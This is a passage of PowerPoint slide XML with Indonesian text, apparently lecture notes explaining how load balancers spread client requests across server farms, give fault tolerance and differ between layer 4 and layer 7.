              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286286052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Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Beban</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> farm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pool. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penolakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> farm yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semuanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialamatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diteruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server lain di farm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>situasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server web, server email front-end, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konferensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konferensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> video, dan server media streaming.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-penyeimbang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port TCP/UDP, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transport model OSI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 7 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seragam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (URL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> streaming video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audio. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
